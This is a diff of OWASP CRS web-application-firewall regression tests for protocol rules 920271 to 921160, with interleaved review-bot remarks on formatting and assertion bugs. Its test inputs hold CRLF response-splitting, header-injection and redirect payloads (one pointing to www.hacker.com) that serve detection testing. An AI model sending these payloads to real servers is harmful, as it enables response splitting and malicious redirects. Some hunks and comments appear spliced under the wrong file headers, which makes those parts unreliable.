+ User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920271\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: hi%13=bye - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: hi%13=bye + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920271\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/%20index.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920271\"" - - test_title: 920271-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/%20index.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920271\"" + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/%FFindex.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - 
no_log_contains: "id \"920271\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/%FFindex.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920271\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml index f4bfeb790..6f350b92a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml 
@@ -1,78 +1,72 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920272.yaml" description: "Description" +rule_id: 920272 tests: - - test_title: 920272-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%25" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%25" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920272\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%80" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%80" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920272\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/index.html?test=t%FFest1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: 
"/index.html?test=t%FFest1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920272\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%35" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920272\"" - - test_title: 920272-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%35" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920272\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/i%FFndex.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: 200 - log_contains: "id \"920272\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/i%FFndex.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 200 + log_contains: "id \"920272\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml index 0589dacc7..e66263274 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml 
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml 
@@ -1,79 +1,73 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920273.yaml" description: "Description" +rule_id: 920273 tests: - - test_title: 920273-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920273\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920273\"" - # the '&' is one of the only symbol allowed - test_title: 920273-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1&test=t" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920273\"" - - test_title: 920273-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1&test=t" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920273\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/index.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "\n" - version: "HTTP/1.1" - output: - no_log_contains: id "921110" - - test_title: 921110-11 + - 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/" + data: "var=budget foo)\n" + version: "HTTP/1.1" + output: + no_log_contains: id "921110" + - test_id: 11 desc: "HTTP Response Splitting false positive test issue 2054" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/" - data: "var=get it\n" - version: "HTTP/1.1" - output: - no_log_contains: id "921110" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/" + data: "var=get it\n" + version: "HTTP/1.1" + output: + no_log_contains: id "921110" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml index cc64c38aa..31bf2953d 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml 
@@ -1,83 +1,77 @@ --- meta: author: csanders-git, Franziska Bühler - description: None - enabled: true - name: 921120.yaml +rule_id: 921120 tests: - - test_title: 921120-1 + - test_id: 1 desc: HTTP response splitting (921120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam - version: HTTP/1.1 - output: - log_contains: id "921120" - - test_title: 921120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam + version: HTTP/1.1 + output: + log_contains: id "921120" + - test_id: 2 desc: "HTTP Response splitting attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423ftw" - version: HTTP/1.1 - output: - log_contains: id "921120" - - test_title: 921120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423ftw" + version: HTTP/1.1 + output: + log_contains: id "921120" + - test_id: 3 desc: "Fix FP issue 1615. Header followed by word chars." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D" - version: HTTP/1.1 - output: - no_log_contains: id "921120" - - test_title: 921120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D" + version: HTTP/1.1 + output: + no_log_contains: id "921120" + - test_id: 4 desc: "Status Page Test - Parameter with value 'CR.LF.Content-Length: 0' to match the rule's regular expression" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%0d%0aContent-Length: 0" - version: HTTP/1.1 - output: - log_contains: id "921120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%0d%0aContent-Length: 0" + version: HTTP/1.1 + output: + log_contains: id "921120" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 1bd49962f..3c54a10dc 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml 
@@ -2,76 +2,70 @@ meta: author: "csanders-git, Franziska Bühler, azurit" description: None - enabled: true - name: 921130.yaml tests: - - test_title: 921130-1 + - test_id: 1 desc: HTTP response splitting (921130) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E" + version: "HTTP/1.1" + output: + log_contains: id "921130" + - test_id: 2 desc: "HTTP Response splitting attack: cookie data" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cookie: "oreo=munchmuch%0d%0a%0d%0a" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cookie: "oreo=munchmuch%0d%0a%0d%0a" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "921130" + - test_id: 3 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" + version: "HTTP/1.1" + output: + log_contains: id "921130" + - test_id: 4 desc: HTTP Request Smuggling with not supported HTTP versions such as HTTP/3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" - version: "HTTP/1.1" - output: - log_contains: id "921130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" + version: "HTTP/1.1" + output: + log_contains: id "921130" 
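Review bot: Unlike the 921120 and 921140 hunks in this commit, the `meta` block here gets no `rule_id: 921130` line — the hunk starts at line 2 and only removes `enabled` and `name` — and it keeps `description: None`, which the 921120 hunk removes; a YAML loader reads the plain scalar `None` as the string "None", not as a null. If the new runner derives test names or the expected `id "921130"` log marker from `rule_id`, this is the file that would be misidentified, so suggest adding `rule_id: 921130` after the description and either dropping `description: None` or replacing it with real text.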
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml index 94f0d5fe7..a6b5cade5 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921140.yaml 
@@ -1,41 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - enabled: true - name: "921140.yaml" description: "Tests for protocol based attacks" +rule_id: 921140 tests: - - test_title: 921140-1 + - test_id: 1 desc: "HTTP Header Injection Attack via headers" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - SomeHeader: "Headerdata\rInjectedHeader: response_splitting_code" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id:921140" - - test_title: 921140-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + SomeHeader: "Headerdata\rInjectedHeader: response_splitting_code" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id:921140" + - test_id: 2 desc: "HTTP Header Injection Attack via headers" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - SomeHeader: "Headerdata%0dInjectedHeader: response_splitting_code" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id:921140" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + SomeHeader: "Headerdata%0dInjectedHeader: response_splitting_code" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id:921140" 
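Review bot: Both `no_log_contains: "id:921140"` assertions in the new tests 1 and 2 use an id format that differs from every other file in this series, which asserts `id "921150"` / `id \"921151\"`. If the engine writes rule ids as `[id "921140"]`, a string containing a colon never appears in the log, so the negative assertion passes whether or not the rule fires and the test cannot catch a false positive. Suggest `no_log_contains: "id \"921140\""` in both tests, matching the quoting style used in 921151.yaml.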
diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml index 54830c91d..c56c5082a 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921150.yaml 
@@ -1,39 +1,36 @@ --- meta: author: "Christian S.J. Peron, azurit" - enabled: true - name: "921150.yaml" description: "Tests for protocol based attacks" +rule_id: 921150 tests: - - test_title: 921150-1 + - test_id: 1 desc: "HTTP Header Injection Attack via payload" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata" - version: "HTTP/1.1" - output: - log_contains: "id \"921150\"" - - test_title: 921150-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata" + version: "HTTP/1.1" + output: + log_contains: "id \"921150\"" + - test_id: 2 desc: "Status Page Test - Header Injection Attack (CR/LF detected): Send a parameter name that includes %0d%0a (percent-encoded CR-LF)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - method: GET - uri: "/get?parameter%0d%0a=test" - version: HTTP/1.0 - output: - log_contains: id "921150" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: GET + uri: "/get?parameter%0d%0a=test" + version: HTTP/1.0 + output: + log_contains: id "921150" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml index 189302946..8609259e6 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml 
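Review bot: The two tests in this file spell the same assertion differently: test 1 has `log_contains: "id \"921150\""` while test 2 has the plain scalar `log_contains: id "921150"`. Both parse to the same string, but test 2 also leaves `dest_addr: 127.0.0.1`, `Host: localhost` and `version: HTTP/1.0` unquoted where test 1 quotes them, so the file mixes two conventions. Suggest quoting test 2 consistently: `dest_addr: "127.0.0.1"`, `version: "HTTP/1.0"`, `log_contains: "id \"921150\""`.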
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921151.yaml 
@@ -1,68 +1,63 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "921151.yaml" description: "Tests to trigger or not trigger rule 921151" +rule_id: 921151 tests: - - test_title: 921151-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?941151-1=test%0Dnext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-1=test%0Dnext=more" + version: "HTTP/1.1" + output: + log_contains: "id \"921151\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?941151-2=test%0Anext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-2=test%0Anext=more" + version: "HTTP/1.1" + output: + log_contains: "id \"921151\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: 
"/get?941151-3=test%0A%0Dnext=more" - version: "HTTP/1.1" - output: - log_contains: "id \"921151\"" - - test_title: 921151-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?941151-3=test%0A%0Dnext=more" + version: "HTTP/1.1" + output: + log_contains: "id \"921151\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: '941151-4=test\r\nmore=text' - version: "HTTP/1.1" - output: - no_log_contains: "id \"921151\"" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: '941151-4=test\r\nmore=text' + version: "HTTP/1.1" + output: + no_log_contains: "id \"921151\"" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml index e0dd6f982..269e7a352 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921160.yaml 
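Review bot: In test 4, `data: '941151-4=test\r\nmore=text'` is single-quoted, so YAML keeps `\r\n` as four literal characters (backslash, r, backslash, n) rather than a CR LF pair. If the intent is to show that a real line break in a POST body does not trigger a rule that inspects GET arguments, the payload as written contains no line break at all and the `no_log_contains` outcome is trivially true; double quotes, `data: "941151-4=test\r\nmore=text"`, would produce a genuine CR LF. Separately, the parameter names `941151-1` through `941151-4` in all four tests do not match `rule_id: 921151`; renaming them `921151-N` avoids confusion when correlating with logs.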
